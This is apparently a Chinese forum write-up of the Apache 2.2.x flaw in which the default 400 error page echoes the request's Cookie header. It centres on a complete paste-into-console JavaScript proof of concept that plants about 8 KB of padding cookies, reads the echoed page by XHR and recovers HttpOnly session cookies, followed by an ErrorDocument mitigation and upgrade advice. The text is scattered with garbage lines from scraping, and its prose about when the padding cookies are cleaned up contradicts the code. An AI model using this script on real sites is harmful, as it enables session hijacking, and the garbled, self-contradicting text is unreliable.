很多程序以及一些商业或成熟开源的 CMS 文章系统，为了防止 XSS 盗取用户 cookie，一般都会给会话 cookie 加上 HttpOnly 属性，禁止 JS 通过 document.cookie 直接读取，从而降低 XSS 的危害。但 HttpOnly 只限制客户端脚本对 cookie 的访问，并不能阻止服务端把请求头原样回显：受影响版本的 Apache 在请求头超长而返回默认的 400 Bad Request 页面时，会把出错的那条请求头（这里就是完整的 Cookie 头）写进响应正文。于是只要先用 JS 往当前域写入约 8 KB 的垃圾 cookie 撑大 Cookie 头，再用 XHR 请求本站任意页面，就能从 400 响应的正文里读到包括 HttpOnly cookie 在内的全部 cookie，从而绕过 HttpOnly 的保护。
/ E; n; X+ G8 J }' w
用 Chrome 打开一个运行在受影响 Apache 版本上的站点（只在自己有权测试的目标上操作），按 F12 打开开发者工具，切到 Console，粘贴以下代码并回车：
+ v9 d2 O# g" T6 n4 @- |0 a
// Adapted from http://www.exploit-db.com/exploits/18442/ (Apache 2.2.x HttpOnly cookie disclosure via the default 400 Bad Request page)
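/**
 * Plant (or expire) the padding cookies used to overflow the request's
 * Cookie header.
 *
 * `count` cookies named xss0..xss<count-1> are written, each carrying a
 * value of `size` "x" characters, so the browser's next same-origin request
 * carries a Cookie header of roughly count*size bytes. With the defaults
 * (10 x 819 = 8190) that is just over Apache's default LimitRequestFieldSize
 * of 8190 bytes, which is what makes the server answer 400 instead of
 * serving the page.
 *
 * @param {boolean} [good]      true  -> expire the padding cookies (clean-up);
 *                              false/undefined -> set them.
 * @param {number}  [count=10]  number of padding cookies to write; tune this
 *                              together with `size` if the target uses a
 *                              different header-size limit.
 * @param {number}  [size=819]  length of each padding value.
 *
 * Side effects only (writes document.cookie); returns nothing.
 * NOTE: makeRequest() strips these entries out of the echoed header with a
 * regex keyed on the "xss<digit>=xxx..." shape. Keep the two in sync if you
 * change the padding character or raise `count` past 10 (two-digit names).
 */
function setCookies(good, count, size) {
  var total = (typeof count === "number") ? count : 10;
  var len = (typeof size === "number") ? size : 819;
  // 1 ms in the past: an already-expired date makes the browser drop the cookie.
  var expired = new Date(+new Date() - 1).toUTCString();
  // ES5-friendly "x".repeat(len); only needed when planting, not when expiring.
  var padding = good ? "" : new Array(len + 1).join("x");

  for (var i = 0; i < total; i++) {
    var name = "xss" + i;
    if (good) {
      // Same path as the planted cookie, otherwise the browser keeps the original.
      document.cookie = name + "=;expires=" + expired + "; path=/;";
    } else {
      // path=/ so the padding rides along on the GET "/" issued by makeRequest().
      document.cookie = name + "=" + padding + ";path=/";
    }
  }
}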
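/**
 * Issue a same-origin GET "/" with the padding cookies in place and, if the
 * server answers 400 and echoes the offending request header inside <pre>,
 * parse that echo back into a {name: value} object and alert() it.
 *
 * This is the HttpOnly bypass: document.cookie cannot show HttpOnly cookies,
 * but the Cookie header reflected in the server's default 400 page can be
 * read from xhr.responseText like any other response body.
 *
 * Relies on the sibling setCookies() and on browser globals
 * (XMLHttpRequest, alert). No return value.
 *
 * Fixes relative to the listing as pasted on this page:
 *  - the paste called .split() on the cookies ARRAY (the "[i]" of
 *    cookies[i] was eaten by forum markup), which throws a TypeError;
 *  - match() returns null when there is no <pre> block, so dereferencing
 *    .length on it throws; the null case is now handled;
 *  - values are split on the FIRST "=" only, so base64-style values that
 *    contain "=" are no longer truncated, and the space after each "; " is
 *    trimmed off the cookie name;
 *  - the padding cookies are expired whenever the request completes, not
 *    only on a 400. Leaving ~8 KB of junk cookies behind makes every later
 *    request to the origin fail, so clean-up must not depend on the status.
 */
function makeRequest() {
  setCookies();

  // Turn the echoed "Cookie: a=1; b=2" header into an object. Padding cookies
  // (xss<digit>=xxx...) are removed first so only the real ones remain.
  function parseCookieHeader(text) {
    var dict = {};
    var echoed = text.replace(/\r|\n/g, "").match(/<pre>(.+)<\/pre>/);
    if (!echoed) {
      return dict;
    }
    var header = echoed[1].replace("Cookie: ", "").replace(/xss\d=x+;?/g, "");
    var parts = header.split(/;/g);
    for (var i = 0; i < parts.length; i++) {
      var pair = parts[i].trim();
      if (!pair) {
        continue; // empty slot left by a trailing ";" or a removed padding cookie
      }
      var eq = pair.indexOf("=");
      if (eq === -1) {
        dict[pair] = ""; // nameless/valueless attribute; keep it visible rather than drop it
      } else {
        dict[pair.slice(0, eq)] = pair.slice(eq + 1);
      }
    }
    return dict;
  }

  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState !== 4) {
      return;
    }
    var found = {};
    // Only the 400 page is expected to reflect the request header.
    if (xhr.status === 400) {
      found = parseCookieHeader(xhr.responseText);
    }
    // Always drop the padding cookies once the request has completed (any
    // status, including status 0 on a network error), so the victim's browser
    // is not left sending an oversized Cookie header on every later request.
    setCookies(true);
    if (xhr.status === 400) {
      alert(JSON.stringify(found));
    }
  };
  xhr.open("GET", "/", true);
  xhr.send(null);
}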
// Entry point of the PoC: plants the padding cookies, fires the XHR that
// should come back as 400, and alerts the cookies parsed out of that page.
makeRequest();
. P3 R0 C- T: [
就能在弹窗里看到 400 错误页回显出来的 cookie 信息（包括带 HttpOnly 的）。若目标已修复或其 400 页面不回显请求头，则不会有任何弹窗；注意上面的脚本只在拿到 400 时才清理 xss0–xss9 这些填充 cookie，此时需手动删除它们，否则浏览器对该站点的后续请求会一直因请求头过大而被拒绝。
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案：
8 \+ F# a; I1 t
Apache 官方提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：
B7 u) M9 N* t8 z* G3 n, s
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message —— 输出一段内置的简单错误信息（默认行为，本文的泄露正是出现在这个默认页面上）
2. output a customized message —— 输出一段自定义文本
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
8 n4 B" p0 `8 a. s; G+ t% e+ L1 v5 n3 r# l; J' ]5 F
经测试，对于这种 400 错误只有方式 2 有效：配置自定义文本后，返回包不会再包含 cookie 内容。方式 3、4 对它不起作用，推测是因为请求在头部解析阶段就已被拒绝，此时无法再做内部或外部跳转。需要强调的是，这只是把回显藏起来的临时缓解，并没有修掉 Apache 本身的缺陷。
/ J1 P: w' f0 C5 j) \
Apache 配置：
; t/ E& C- k6 z( w! J
ErrorDocument 400 "security test"
（注意 ErrorDocument 与状态码之间要有空格；以双引号开头的参数会被 Apache 当作要输出的文本，而不是跳转的 URL。）
6 h$ b% u' s3 w. X2 `4 H& K
当然，根本的解决方案是把 Apache 升级到已修复此问题的版本（见下面的 2.2 安全公告）；ErrorDocument 只是在无法立即升级时的临时缓解。
参考：http://httpd.apache.org/security/vulnerabilities_22.html
% C" y) \1 h+ {' i8 Z |